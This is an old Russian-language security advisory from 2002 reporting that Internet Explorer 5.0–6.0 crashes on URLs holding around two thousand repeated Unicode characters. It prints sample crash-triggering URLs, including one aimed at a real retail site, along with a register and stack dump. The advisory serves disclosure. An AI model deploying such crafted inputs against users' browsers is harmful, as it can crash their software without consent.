Security Lab

Переполнение буфера в IE 5.0-6.0 используя Unicode символы

Дата публикации:18.04.2002
Всего просмотров:1098
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Микрософт Internet Explorer терпит крах при доступе к URL, содержащему чрезмерное число unicode символов. Причина происходящего не известна. Не возможно воспроизвести эту проблему на всех средах, включая две различные системы, выполняющие ту же самую версию операционной системы Windows с той же самой версией Internet Explorer.

Пример 1:
about:ááááááááááááááááááááááááá[2.041 GREEK CHARS]ââââââââââââââââââá
http://áááááááááááááááááááááááááááááâââââââââââ[2.041 GREEK CHARS]äááá
gopher://áááááááááááááááááá[2.041 GREEK CHARS]ááääääääääääääóóóóóóóååå

Произойдет следующая ошибка:

IEXPLORE caused an invalid page fault in module BROWSEUI.DLL at 015f:710283c0.
Registers:
EAX=cececece CS=015f EIP=710283c0 EFLGS=00010282
EBX=00000000 SS=0167 ESP=0058a054 EBP=0058bce0
ECX=817364ec DS=0167 ESI=0058b8d0 FS=3897
EDX=00000000 ES=0167 EDI=00000000 GS=0000
Bytes at CS:EIP:
ff 70 08 ff 75 0c ff 15 a0 14 02 71 89 5d f8 8d
Stack dump:
cececece 00421464 00420858 00000000 00620061 0075006f 003a0074 00b100ce
00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce 00b100ce
 

Пример 2:

http://www.bestbuy.com.cy/cgi-bin/buy.storefront/<<<&aacute;x1388>>>/Product/View/CMPL_00_GDXbox

Уязвимость найдена в Interner explorer 5.0-6.0

Ссылки: Источник
Источник 2